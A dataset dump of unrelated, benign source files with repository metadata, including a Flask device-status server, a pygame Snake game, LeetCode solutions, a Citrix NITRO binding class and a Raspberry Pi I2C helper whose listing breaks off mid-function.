It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cool_django.settings")
application = get_wsgi_application()
|
[
"minar09.bd@gmail.com"
] |
minar09.bd@gmail.com
|
38e603282b78b3b541f33eda526c3cda85a1015a
|
765ac31545ea443f406493615603dd973b6a27f1
|
/pycode/restSrv.py
|
73e8611448f9ad4ac08de07c7dffd86087aab9c4
|
[] |
no_license
|
aleksandarkovacevic30/smv-blueprint
|
6ffbc370bc20228e8eab9640871b2e9b41a7859f
|
22dc97a26161928a031889a06ada6bc900249e74
|
refs/heads/master
| 2022-08-22T08:22:49.459038
| 2020-01-17T10:45:35
| 2020-01-17T10:45:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
from flask import Flask, json, abort
from flask import request
import random
states = ["DEVICE_INACTIVE_STATE","DEVICE_ACTIVE_STATE","DEVICE_ERROR_STATE"]
api = Flask(__name__)
@api.route('/api/device/status', methods=['POST'])
def post_device_status():
if not request.json:
abort(400)
print(request.json)
response={"state":random.choice(states),"config":{"ska":"3600"}}
return json.dumps(response,sort_keys=False)
if __name__ == '__main__':
api.run()
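# A minimal client sketch (illustrative only; assumes the `requests` package is
# installed, the server is running on Flask's default port 5000, and the
# {'deviceId': 1} payload is a hypothetical example body):
# import requests
# r = requests.post('http://127.0.0.1:5000/api/device/status', json={'deviceId': 1})
# print(r.text)  # e.g. {"state": "DEVICE_ACTIVE_STATE", "config": {"ska": "3600"}}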
|
[
"akovacev@intersystems.com"
] |
akovacev@intersystems.com
|
7edfcbe3571033cb681c2f534078ce61f178fea9
|
f7ec5c267111ffee58711586471d602c45166d0b
|
/FreqSeek.py
|
89501e73ef1aaef966761340f19defef72ce43fd
|
[] |
no_license
|
ManeshNarayan/GenomeAnalysis
|
6bbc8c4d297b26643f94f3d438372d13401c4f90
|
3b76bc2d2247469e1c7b0c7ba8cc8bc335effb43
|
refs/heads/master
| 2021-01-01T03:50:35.988683
| 2016-11-08T19:30:59
| 2016-11-08T19:30:59
| 57,366,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,633
|
py
|
import itertools
import os,sys
import xlsxwriter
from multiprocessing import Pool
def spacerCountWrite(motif1,motif2):
Files = [None] * 30  # placeholders; each slot is replaced by the spacer file handle below
workbook = xlsxwriter.Workbook(motif1+"-"+motif2+"/"+motif1+"-"+motif2+".xlsx")
worksheet = workbook.add_worksheet()
worksheet.write(0, 1, "A")
worksheet.write(0, 2, "T")
worksheet.write(0, 3, "G")
worksheet.write(0, 4, "C")
for i in range(1,31):
CntA = 0
CntT = 0
CntG = 0
CntC = 0
Files[i-1] = open(motif1+"-"+motif2+"/"+"spacer"+str(i)+".txt","r")
for String in Files[i-1].readlines():
CntA+=String.count("a")
CntT+=String.count("t")
CntG+=String.count("g")
CntC+=String.count("c")
worksheet.write(i, 1, CntA)
worksheet.write(i, 2, CntT)
worksheet.write(i, 3, CntG)
worksheet.write(i, 4, CntC)
Files[i-1].close()
workbook.close()
def func_star(a_b):
"""Convert `f([1,2])` to `f(1,2)` call."""
return spacerCountWrite(*a_b)
pool = Pool(8)
#motifs = ["tgtcaa","tgtcac","tgtcag","tgtcat","tgtcca","tgtccc","tgtccg","tgtcct","tgtcga","tgtcgc","tgtcgg","tgtcgt","tgtcta","tgtctc","tgtctg","tgtctt"]
motifs1 = ["tgtcaa"]*16+["tgtcac"]*16+["tgtcag"]*16+["tgtcat"]*16+["tgtcca"]*16+["tgtccc"]*16+["tgtccg"]*16+["tgtcct"]*16+["tgtcga"]*16+["tgtcgc"]*16+["tgtcgg"]*16+["tgtcgt"]*16+["tgtcta"]*16+["tgtctc"]*16+["tgtctg"]*16+["tgtctt"]*16
motifs2 = ["tgtcaa","tgtcac","tgtcag","tgtcat","tgtcca","tgtccc","tgtccg","tgtcct","tgtcga","tgtcgc","tgtcgg","tgtcgt","tgtcta","tgtctc","tgtctg","tgtctt"]*16
pool.map(func_star, itertools.izip(motifs1, motifs2))
|
[
"noreply@github.com"
] |
ManeshNarayan.noreply@github.com
|
0d4fd0289193ebb58c6326e031b53ce58d6882c1
|
34ce81ba8764f3c5ac14ab8194bd40ba4039d368
|
/LeetCode/85_maximalRectangle.py
|
7b348c1afb9cf342889ea38b50b55e9b91bb1ece
|
[] |
no_license
|
Una-zh/algorithms
|
b06a7292da7ce914795fdd14c0e9332aa74d5e65
|
24cf4bb2496c4901aa000ff692a58396ff45589a
|
refs/heads/master
| 2020-07-24T18:23:57.073470
| 2019-09-12T13:56:48
| 2019-09-12T13:56:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,487
|
py
|
# -- coding: utf-8 --
# author: una
# datetime: 2019-08-15 15:55
from typing import List
class Solution:
def maximalRectangle(self, matrix: List[List[str]]) -> int:
if not matrix or not matrix[0]:
return 0
def largestRectangleArea(heights):
if not heights:
return 0
stack = list([-1])
area = 0
for i in range(len(heights)):
if stack[-1] == -1 or heights[stack[-1]] <= heights[i]:
stack.append(i)
else:
while stack[-1] > -1 and heights[stack[-1]] > heights[i]:
tmp_h = heights[stack.pop()]
area = max(area, tmp_h * (i - stack[-1] - 1))
stack.append(i)
i += 1
while stack[-1] > -1:
tmp_h = heights[stack.pop()]
area = max(area, tmp_h * (i - stack[-1] - 1))
return area
heights = list(map(int, matrix[0]))
final_res = largestRectangleArea(heights)
for i in range(1, len(matrix)):
heights = [heights[j] + 1 if matrix[i][j] == '1' else 0 for j in range(len(matrix[i]))]
final_res = max(final_res, largestRectangleArea(heights))
return final_res
if __name__ == '__main__':
a = [
["1","0","1","0","0"],
["1","0","1","1","1"],
["1","1","1","1","1"],
["1","0","0","1","0"]
]
print(Solution().maximalRectangle(a))
|
[
"994521950@qq.com"
] |
994521950@qq.com
|
5c6a74ca2440defc0e3aa24f241551b7899aec5a
|
c2af84d93b1c160ab90a580949247eeb9f0f6bc3
|
/src/game.py
|
67c0f9bf5fcc4e139debccf8bebdc6bb4e5dcbae
|
[] |
no_license
|
jhnkim23/SnakeAI
|
06bff316a91d88d090e6f1a3c0a6f013ee00fe34
|
e21603934c8b507d8d182e3549a2ed1f23b6598a
|
refs/heads/master
| 2023-08-17T00:10:08.474112
| 2023-08-13T17:46:56
| 2023-08-13T17:46:56
| 285,366,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,323
|
py
|
import pygame
import random
NORTH = 1
EAST = 2
SOUTH = 3
WEST = 4
cols, rows = (15, 15)
block_size = 30
snake = [(0, 2), (0, 1), (0, 0)]
prev_direction = SOUTH
direction = SOUTH
food = (random.randint(0, cols-1), random.randint(0, rows-1))
while food in snake:
food = (random.randint(0, cols-1), random.randint(0, rows-1))
score = 0
snake_grow = False
pygame.init()
pygame.display.set_caption('Snake (Score: 0)')
screen = pygame.display.set_mode(((block_size + 2) * cols, (block_size + 2) * rows))
def is_dead():
#Left, Right, Top, Bottom collision
if snake[0][0] < 0 or snake[0][0] > cols-1 or snake[0][1] < 0 or snake[0][1] > rows-1:
return True
#Body collision
for i in range(1, len(snake) - 1):
if (snake[0][0] == snake[i][0]) and (snake[0][1] == snake[i][1]):
return True
return False
def draw_rect(color, row, col):
pygame.draw.rect(screen, color, (row*(block_size+2)+1, col*(block_size+2)+1, block_size, block_size))
done = False
while not done:
pygame.time.delay(100)
pygame.display.set_caption("Snake (Score: " + str(score) + ")")
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP and prev_direction != SOUTH:
direction = NORTH
elif event.key == pygame.K_DOWN and prev_direction != NORTH:
direction = SOUTH
elif event.key == pygame.K_LEFT and prev_direction != EAST:
direction = WEST
elif event.key == pygame.K_RIGHT and prev_direction != WEST:
direction = EAST
screen.fill((30, 30, 30))
pygame.display.flip()
# Move snake body
# Iterate through snake backwards, excluding the head
if snake_grow:
snake.append((-1, -1))
snake_grow = False
for i in range(len(snake) - 1, 0, -1):
snake[i] = snake[i - 1]
prev_direction = direction
# Move snake head
head = snake[0]
if direction == NORTH:
snake[0] = (head[0], head[1] - 1)
elif direction == SOUTH:
snake[0] = (head[0], head[1] + 1)
elif direction == WEST:
snake[0] = (head[0] - 1, head[1])
elif direction == EAST:
snake[0] = (head[0] + 1, head[1])
#Check death collisions
if is_dead():
done = True
#Check food collision
if snake[0][0] == food[0] and snake[0][1] == food[1]:
score += 1
food = (random.randint(0, cols-1), random.randint(0, rows-1))
while food in snake:
food = (random.randint(0, cols-1), random.randint(0, rows-1))
snake_grow = True
#Food placement ideas (TODO):
#- collect the empty cells into a set, then pick one at random
#- build the set of all cells, shuffle, then skip cells occupied by the snake
#- build the set of all cells and remove every cell the snake occupies
# Draw the board
for r in range(rows):
for c in range(cols):
draw_rect((10, 10, 10), r, c)
# Draw the Snake over board
for i in range(len(snake)):
draw_rect((0, 255, 0), snake[i][0], snake[i][1])
# Draw the food over board
draw_rect((255, 0, 0), food[0], food[1])
# So we don't show snake out of board
if not done:
pygame.display.update()
pygame.quit()
|
[
"junholee6a@gmail.com"
] |
junholee6a@gmail.com
|
c21baec84c2ca56107d83dc562391ea5f739d031
|
24e321fb4b36af3cf38090e6a1c3ded8c4d2c678
|
/grammar-basic/Day40/5_3.2.py
|
6716bfc833763dea2344197696cbd39e8d1b8493
|
[] |
no_license
|
zhent1106/python-learning
|
027635b23bfa36074fa3683e6db98cfe8446def2
|
06302db66fc9a3aeb57528aa921baa9849219857
|
refs/heads/master
| 2021-04-17T16:37:54.351257
| 2020-06-06T05:05:22
| 2020-06-06T05:05:22
| 249,459,773
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
"""
元组是不可变的,所以没用插入和删除方法
"""
from numpy import random
a = () # 空元组对象
b = (1, 'xiaoming', 29.5, '17312662388')
c = ('001', '2020-05-04', ['三文鱼', '电烤箱'])
# 从[1,5)区间内随机选择 10 个数
a = random.randint(1, 5, 10)
print(a)
at = tuple(a)
print(at)
# 统计 3 出现次数
at.count(3)
print(at.count(3))
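# A small illustrative addition: tuples reject item assignment, so convert to a
# list first if the values need to change.
try:
    at[0] = 99  # raises TypeError because tuples are immutable
except TypeError as err:
    print('tuples are immutable:', err)
at_list = list(at)
at_list[0] = 99  # lists are mutable, so this works
print(at_list)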
|
[
"1299088269@qq.com"
] |
1299088269@qq.com
|
91724e3cf1d2a293e5ba66f794160dbad8996b76
|
e4c3653fe09b0ac6e4f8450be111a7988ac5b405
|
/data/small.py
|
39c06c88beede54e41f865fea2b4bedbb8bad99b
|
[] |
no_license
|
Maronato/NGP
|
75a8ca7b80df1e9b37b497f04189cc18e93bc2a0
|
3fd2c3c3eb77fe081e9a262224f420f79cbe09cf
|
refs/heads/master
| 2020-07-06T00:51:34.072938
| 2017-04-21T23:53:53
| 2017-04-21T23:53:53
| 73,972,542
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
X = [
[5, 3, 0, 1],
[4, 0, 0, 1],
[1, 1, 0, 5],
[1, 0, 0, 4],
[0, 1, 5, 4],
]
def load():
return X
|
[
"gustavomaronato@gmail.com"
] |
gustavomaronato@gmail.com
|
a1aab4298b55a5e3cb7d2463a99b436ac2d74f5a
|
c78e67c6eb74e505fbcbbb38d2f7c17daaf72b60
|
/leetcode/609. Find Duplicate File in System.py
|
0b99a10cbb5474d3d2aed453ffc7df556bd8a429
|
[] |
no_license
|
CapSOSkw/My_leetcode
|
8af706066a464ebeb91888048ee296e8c5f4d195
|
32c37aee41e6fdd5b95f639239b9d72d22d7541c
|
refs/heads/master
| 2021-07-10T02:35:36.501353
| 2020-07-01T12:40:43
| 2020-07-01T12:40:43
| 141,933,204
| 0
| 1
| null | 2018-09-26T00:57:35
| 2018-07-22T21:51:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,823
|
py
|
'''
Given a list of directory info including directory path, and all the files with contents in this directory,
you need to find out all the groups of duplicate files in the file system in terms of their paths.
A group of duplicate files consists of at least two files that have exactly the same content.
A single directory info string in the input list has the following format:
"root/d1/d2/.../dm f1.txt(f1_content) f2.txt(f2_content) ... fn.txt(fn_content)"
It means there are n files
(f1.txt, f2.txt ... fn.txt with content f1_content, f2_content ... fn_content, respectively)
in directory root/d1/d2/.../dm. Note that n >= 1 and m >= 0. If m = 0,
it means the directory is just the root directory.
The output is a list of group of duplicate file paths.
For each group, it contains all the file paths of the files that have the same content.
A file path is a string that has the following format:
"directory_path/file_name.txt"
Example 1:
Input:
["root/a 1.txt(abcd) 2.txt(efgh)", "root/c 3.txt(abcd)", "root/c/d 4.txt(efgh)", "root 4.txt(efgh)"]
Output:
[["root/a/2.txt","root/c/d/4.txt","root/4.txt"],["root/a/1.txt","root/c/3.txt"]]
Note:
No order is required for the final output.
You may assume the directory name, file name and file content only has letters and digits,
and the length of file content is in the range of [1,50].
The number of files given is in the range of [1,20000].
You may assume no files or directories share the same name in the same directory.
You may assume each given directory info represents a unique directory.
Directory path and file info are separated by a single blank space.
Follow-up beyond contest:
Imagine you are given a real file system, how will you search files? DFS or BFS?
If the file content is very large (GB level), how will you modify your solution?
If you can only read the file by 1kb each time, how will you modify your solution?
What is the time complexity of your modified solution? What is the most time-consuming part and memory consuming part of it? How to optimize?
How to make sure the duplicated files you find are not false positive?
'''
import re
from collections import defaultdict
class Solution:
def findDuplicate(self, paths):
"""
:type paths: List[str]
:rtype: List[List[str]]
"""
my_dict = defaultdict(list)
for path in paths:
root, *file = path.split(" ")
for f in file:
txt, content = f.split('(')
my_dict[content].append(root+'/'+txt)
print(root+'/'+txt)
x = [my_dict[key] for key in my_dict if len(my_dict[key]) > 1]
print(x)
return x
s = Solution()
x = ["root/a 1.txt(abcd) 2.txt(efgh)", "root/c 3.txt(abcd)", "root/c/d 4.txt(efgh)", "root 4.txt(efgh)"]
s.findDuplicate(x)
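# Per the problem statement above, the expected grouping for this input
# (order may vary) is:
# [["root/a/2.txt", "root/c/d/4.txt", "root/4.txt"], ["root/a/1.txt", "root/c/3.txt"]]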
|
[
"wky0702@gmail.com"
] |
wky0702@gmail.com
|
583352fdd34769d14f54b7a5a431215c19c362da
|
baf90325a6f0b0633895dcd184c4c5c088531ee6
|
/models/__init__.py
|
eb0d3517bc14316b026b51c0e341bfcb52d30895
|
[
"MIT"
] |
permissive
|
wo984c/multi-user-blog
|
7b78fd5d029d7ea1825c3283cd6f6de9912701df
|
15bff1eee6d13b97ab4b526f7bf5eb383fc4a788
|
refs/heads/master
| 2020-03-20T16:48:12.439013
| 2018-09-08T18:15:36
| 2018-09-08T18:15:36
| 137,546,033
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
# Python will know that this directory is a Python package directory
# other than an ordinary directory
|
[
"williamortiz@Williams-MacBook-Pro.local"
] |
williamortiz@Williams-MacBook-Pro.local
|
7e7beb1ec8cd79af6e18720e40d20054f6e8dfb1
|
ba83e0c274597cab7c5ca3f089f6a2b841cd2820
|
/Authorize/apps.py
|
2280c85d0fc3e4429f0d516a55fc910c9fdbffdc
|
[] |
no_license
|
u1456168/random
|
814fbabbd200022548e8c9d9c2fe59bb238ffe83
|
1b9984ff47bcfb9a70c5127e01135c3a2f22ab49
|
refs/heads/master
| 2021-01-06T03:57:46.252360
| 2017-05-08T19:12:44
| 2017-05-08T19:12:44
| 90,662,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from django.apps import AppConfig
class AuthorizeConfig(AppConfig):
name = 'Authorize'
|
[
"noreply@github.com"
] |
u1456168.noreply@github.com
|
ae32b4f702bc089d454ca0abbbde7f6fcdb4e387
|
ba3231b25c60b73ca504cd788efa40d92cf9c037
|
/nitro-python-13.0.36/nssrc/com/citrix/netscaler/nitro/resource/config/basic/servicegroup_lbmonitor_binding.py
|
66fe42dff6c016224ea1e6bca3ab49cdf79478be
|
[
"Apache-2.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
zhuweigh/vpx13
|
f6d559ae85341e56472e3592cbc67062dac34b93
|
b36caa3729d3ca5515fa725f2d91aeaabdb2daa9
|
refs/heads/master
| 2020-07-04T22:15:16.595728
| 2019-09-20T00:19:56
| 2019-09-20T00:19:56
| 202,435,307
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,641
|
py
|
#
# Copyright (c) 2008-2019 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class servicegroup_lbmonitor_binding(base_resource) :
""" Binding class showing the lbmonitor that can be bound to servicegroup.
"""
def __init__(self) :
self._monitor_name = None
self._monweight = None
self._monstate = None
self._weight = None
self._passive = None
self._servicegroupname = None
self._port = None
self._customserverid = None
self._serverid = None
self._state = None
self._hashid = None
self._nameserver = None
self._dbsttl = None
self.___count = None
@property
def servicegroupname(self) :
r"""Name of the service group.<br/>Minimum length = 1.
"""
try :
return self._servicegroupname
except Exception as e:
raise e
@servicegroupname.setter
def servicegroupname(self, servicegroupname) :
r"""Name of the service group.<br/>Minimum length = 1
"""
try :
self._servicegroupname = servicegroupname
except Exception as e:
raise e
@property
def port(self) :
r"""Port number of the service. Each service must have a unique port number.<br/>Range 1 - 65535<br/>* in CLI is represented as 65535 in NITRO API.
"""
try :
return self._port
except Exception as e:
raise e
@port.setter
def port(self, port) :
r"""Port number of the service. Each service must have a unique port number.<br/>Range 1 - 65535<br/>* in CLI is represented as 65535 in NITRO API
"""
try :
self._port = port
except Exception as e:
raise e
@property
def nameserver(self) :
r"""Specify the nameserver to which the query for bound domain needs to be sent. If not specified, use the global nameserver.
"""
try :
return self._nameserver
except Exception as e:
raise e
@nameserver.setter
def nameserver(self, nameserver) :
r"""Specify the nameserver to which the query for bound domain needs to be sent. If not specified, use the global nameserver.
"""
try :
self._nameserver = nameserver
except Exception as e:
raise e
@property
def state(self) :
r"""Initial state of the service after binding.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._state
except Exception as e:
raise e
@state.setter
def state(self, state) :
r"""Initial state of the service after binding.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._state = state
except Exception as e:
raise e
@property
def hashid(self) :
r"""Unique numerical identifier used by hash based load balancing methods to identify a service.<br/>Minimum value = 1.
"""
try :
return self._hashid
except Exception as e:
raise e
@hashid.setter
def hashid(self, hashid) :
r"""Unique numerical identifier used by hash based load balancing methods to identify a service.<br/>Minimum value = 1
"""
try :
self._hashid = hashid
except Exception as e:
raise e
@property
def serverid(self) :
r"""The identifier for the service. This is used when the persistency type is set to Custom Server ID.
"""
try :
return self._serverid
except Exception as e:
raise e
@serverid.setter
def serverid(self, serverid) :
r"""The identifier for the service. This is used when the persistency type is set to Custom Server ID.
"""
try :
self._serverid = serverid
except Exception as e:
raise e
@property
def customserverid(self) :
r"""Unique service identifier. Used when the persistency type for the virtual server is set to Custom Server ID.<br/>Default value: "None".
"""
try :
return self._customserverid
except Exception as e:
raise e
@customserverid.setter
def customserverid(self, customserverid) :
r"""Unique service identifier. Used when the persistency type for the virtual server is set to Custom Server ID.<br/>Default value: "None"
"""
try :
self._customserverid = customserverid
except Exception as e:
raise e
@property
def weight(self) :
r"""Weight to assign to the servers in the service group. Specifies the capacity of the servers relative to the other servers in the load balancing configuration. The higher the weight, the higher the percentage of requests sent to the service.<br/>Minimum value = 1<br/>Maximum value = 100.
"""
try :
return self._weight
except Exception as e:
raise e
@weight.setter
def weight(self, weight) :
r"""Weight to assign to the servers in the service group. Specifies the capacity of the servers relative to the other servers in the load balancing configuration. The higher the weight, the higher the percentage of requests sent to the service.<br/>Minimum value = 1<br/>Maximum value = 100
"""
try :
self._weight = weight
except Exception as e:
raise e
@property
def monitor_name(self) :
r"""Monitor name.
"""
try :
return self._monitor_name
except Exception as e:
raise e
@monitor_name.setter
def monitor_name(self, monitor_name) :
r"""Monitor name.
"""
try :
self._monitor_name = monitor_name
except Exception as e:
raise e
@property
def dbsttl(self) :
r"""Specify the TTL for DNS record for domain based service.The default value of ttl is 0 which indicates to use the TTL received in DNS response for monitors.<br/>Default value: 0.
"""
try :
return self._dbsttl
except Exception as e:
raise e
@dbsttl.setter
def dbsttl(self, dbsttl) :
r"""Specify the TTL for DNS record for domain based service.The default value of ttl is 0 which indicates to use the TTL received in DNS response for monitors.<br/>Default value: 0
"""
try :
self._dbsttl = dbsttl
except Exception as e:
raise e
@property
def passive(self) :
r"""Indicates if load monitor is passive. A passive load monitor does not remove service from LB decision when threshold is breached.
"""
try :
return self._passive
except Exception as e:
raise e
@passive.setter
def passive(self, passive) :
r"""Indicates if load monitor is passive. A passive load monitor does not remove service from LB decision when threshold is breached.
"""
try :
self._passive = passive
except Exception as e:
raise e
@property
def monstate(self) :
r"""Monitor state.<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._monstate
except Exception as e:
raise e
@monstate.setter
def monstate(self, monstate) :
r"""Monitor state.<br/>Possible values = ENABLED, DISABLED
"""
try :
self._monstate = monstate
except Exception as e:
raise e
@property
def monweight(self) :
r"""weight of the monitor that is bound to servicegroup.
"""
try :
return self._monweight
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(servicegroup_lbmonitor_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.servicegroup_lbmonitor_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.servicegroupname is not None :
return str(self.servicegroupname)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = servicegroup_lbmonitor_binding()
updateresource.servicegroupname = resource.servicegroupname
updateresource.port = resource.port
updateresource.monitor_name = resource.monitor_name
updateresource.monstate = resource.monstate
updateresource.passive = resource.passive
updateresource.weight = resource.weight
updateresource.customserverid = resource.customserverid
updateresource.serverid = resource.serverid
updateresource.state = resource.state
updateresource.hashid = resource.hashid
updateresource.nameserver = resource.nameserver
updateresource.dbsttl = resource.dbsttl
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [servicegroup_lbmonitor_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].servicegroupname = resource[i].servicegroupname
updateresources[i].port = resource[i].port
updateresources[i].monitor_name = resource[i].monitor_name
updateresources[i].monstate = resource[i].monstate
updateresources[i].passive = resource[i].passive
updateresources[i].weight = resource[i].weight
updateresources[i].customserverid = resource[i].customserverid
updateresources[i].serverid = resource[i].serverid
updateresources[i].state = resource[i].state
updateresources[i].hashid = resource[i].hashid
updateresources[i].nameserver = resource[i].nameserver
updateresources[i].dbsttl = resource[i].dbsttl
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = servicegroup_lbmonitor_binding()
deleteresource.servicegroupname = resource.servicegroupname
deleteresource.port = resource.port
deleteresource.monitor_name = resource.monitor_name
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [servicegroup_lbmonitor_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].servicegroupname = resource[i].servicegroupname
deleteresources[i].port = resource[i].port
deleteresources[i].monitor_name = resource[i].monitor_name
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, servicegroupname="", option_="") :
r""" Use this API to fetch servicegroup_lbmonitor_binding resources.
"""
try :
if not servicegroupname :
obj = servicegroup_lbmonitor_binding()
response = obj.get_resources(service, option_)
else :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, servicegroupname, filter_) :
r""" Use this API to fetch filtered set of servicegroup_lbmonitor_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, servicegroupname) :
r""" Use this API to count servicegroup_lbmonitor_binding resources configued on NetScaler.
"""
try :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, servicegroupname, filter_) :
r""" Use this API to count the filtered set of servicegroup_lbmonitor_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = servicegroup_lbmonitor_binding()
obj.servicegroupname = servicegroupname
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class State:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Monstate:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class servicegroup_lbmonitor_binding_response(base_response) :
def __init__(self, length=1) :
self.servicegroup_lbmonitor_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.servicegroup_lbmonitor_binding = [servicegroup_lbmonitor_binding() for _ in range(length)]
|
[
"zhuwei@xsky.com"
] |
zhuwei@xsky.com
|
910cf1056b16c60ffd537ab2d22a1b09f7182cc2
|
d8f5a5f3a8b597765df1fcaaf112b9d5eaa3ae2c
|
/Raspi_I2C.py
|
c5d1d77e3805ed34f16ccb5ae13679ee3bdfd038
|
[] |
no_license
|
andy-pi/berrybot
|
427174478ab2280451251d937160ea34091c5a30
|
c05f05394090eb51d54124d403ac5dc7f790d775
|
refs/heads/master
| 2021-01-01T03:44:05.094852
| 2016-05-19T23:31:34
| 2016-05-19T23:31:34
| 58,291,070
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,505
|
py
|
#!/usr/bin/python
# by UKonline2000
import re
import smbus
# ===========================================================================
# Raspi_I2C Class
# ===========================================================================
class Raspi_I2C(object):
@staticmethod
def getPiRevision():
"Gets the version number of the Raspberry Pi board"
# Revision list available at: http://elinux.org/RPi_HardwareHistory#Board_Revision_History
try:
with open('/proc/cpuinfo', 'r') as infile:
for line in infile:
# Match a line of the form "Revision : 0002" while ignoring extra
# info in front of the revsion (like 1000 when the Pi was over-volted).
match = re.match('Revision\s+:\s+.*(\w{4})$', line)
if match and match.group(1) in ['0000', '0002', '0003']:
# Return revision 1 if revision ends with 0000, 0002 or 0003.
return 1
elif match:
# Assume revision 2 if revision ends with any other 4 chars.
return 2
# Couldn't find the revision, assume revision 0 like older code for compatibility.
return 0
except:
return 0
@staticmethod
def getPiI2CBusNumber():
# Gets the I2C bus number /dev/i2c#
return 1 if Raspi_I2C.getPiRevision() > 1 else 0
def __init__(self, address, busnum=-1, debug=False):
self.address = address
# By default, the correct I2C bus is auto-detected using /proc/cpuinfo
# Alternatively, you can hard-code the bus version below:
# self.bus = smbus.SMBus(0); # Force I2C0 (early 256MB Pi's)
# self.bus = smbus.SMBus(1); # Force I2C1 (512MB Pi's)
self.bus = smbus.SMBus(busnum if busnum >= 0 else Raspi_I2C.getPiI2CBusNumber())
self.debug = debug
def reverseByteOrder(self, data):
"Reverses the byte order of an int (16-bit) or long (32-bit) value"
# Courtesy Vishal Sapre
byteCount = len(hex(data)[2:].replace('L','')[::2])
val = 0
for i in range(byteCount):
val = (val << 8) | (data & 0xff)
data >>= 8
return val
def errMsg(self):
print "Error accessing 0x%02X: Check your I2C address" % self.address
return -1
def write8(self, reg, value):
"Writes an 8-bit value to the specified register/address"
try:
self.bus.write_byte_data(self.address, reg, value)
if self.debug:
print "I2C: Wrote 0x%02X to register 0x%02X" % (value, reg)
except IOError, err:
return self.errMsg()
def write16(self, reg, value):
"Writes a 16-bit value to the specified register/address pair"
try:
self.bus.write_word_data(self.address, reg, value)
if self.debug:
print ("I2C: Wrote 0x%02X to register pair 0x%02X,0x%02X" %
(value, reg, reg+1))
except IOError, err:
return self.errMsg()
def writeRaw8(self, value):
"Writes an 8-bit value on the bus"
try:
self.bus.write_byte(self.address, value)
if self.debug:
print "I2C: Wrote 0x%02X" % value
except IOError, err:
return self.errMsg()
def writeList(self, reg, list):
"Writes an array of bytes using I2C format"
try:
if self.debug:
print "I2C: Writing list to register 0x%02X:" % reg
print list
self.bus.write_i2c_block_data(self.address, reg, list)
except IOError, err:
return self.errMsg()
def readList(self, reg, length):
"Read a list of bytes from the I2C device"
try:
results = self.bus.read_i2c_block_data(self.address, reg, length)
if self.debug:
